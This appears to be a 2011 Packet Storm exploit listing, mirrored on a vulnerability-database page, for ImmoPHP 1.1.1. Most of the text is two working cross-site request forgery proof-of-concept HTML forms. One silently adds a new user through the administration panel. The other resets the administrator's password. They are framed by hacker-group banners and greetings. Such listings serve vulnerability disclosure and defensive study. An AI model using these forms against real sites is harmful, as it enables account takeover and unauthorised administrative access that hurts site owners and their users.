Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:101539
HistoryMay 19, 2011 - 12:00 a.m.

ImmoPHP 1.1.1 Cross Site Request Forgery

2011-05-1900:00:00
KedAns-Dz
packetstormsecurity.com
28
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : ImmoPHP v1.1.1 Remote (CSRF) Multiple Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Cross-Site Request Forgery  
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En  
###  
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends   
###  
  
# (!) Exploit & PoC :  
  
#=(1)======[Add New User :]=======>  
  
<h3>Remote CSRF Add NeW User :</h3>  
<form method="post" action="http://[target]/administration/utilisateur_ajout.php">  
<table class="tcenter"><tr>  
<td><label>Name :</label></td>  
<td><input type="text" name="nom" id="nom" /></td></tr><tr>  
<td><label>Nick :</label></td>  
<td><input type="text" name="prenom" /></td></tr><tr>  
<td><label>Password :</label></td>  
<td><input type="password" name="mdp" id="mdp"/></td></tr><tr>  
<td><label>Password <i><small>(confirmation)</small></i> :</label></td>  
<td><input type="password" name="mdp2" id="mdp2"/></td>  
</tr><tr><td><label>E-mail :</label></td>  
<td><input type="text" name="email" /></td></tr>  
<tr><td colspan="2" align="center">  
<input type="hidden" name="token" value="Administrator" />  
<input type="submit" name="send_user" value="Save & Send" /></td></tr>  
</table>  
</form>  
  
  
#=(2)======[Change Admin password :]=======>  
  
<div class="center"><h3>Remote CSRF Change Admin password :</h3></div>  
<form method="post" action="http://[target]/administration/utilisateur_password.php">  
<table class="tcenter"><tr><td><label>New Password :</label></td>  
<td><input type="password" name="mdp" /></td></tr><tr>  
<td><label>New Password <small><i>(confirmation)</i></small> :</label></td>  
<td><input type="password" name="mdp2" /></td></tr>  
<input type="hidden" name="id" value="1" /></table>  
<input type="submit" name="send_password" value="Save & Send" /></td></tr>  
</form>  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`
JSON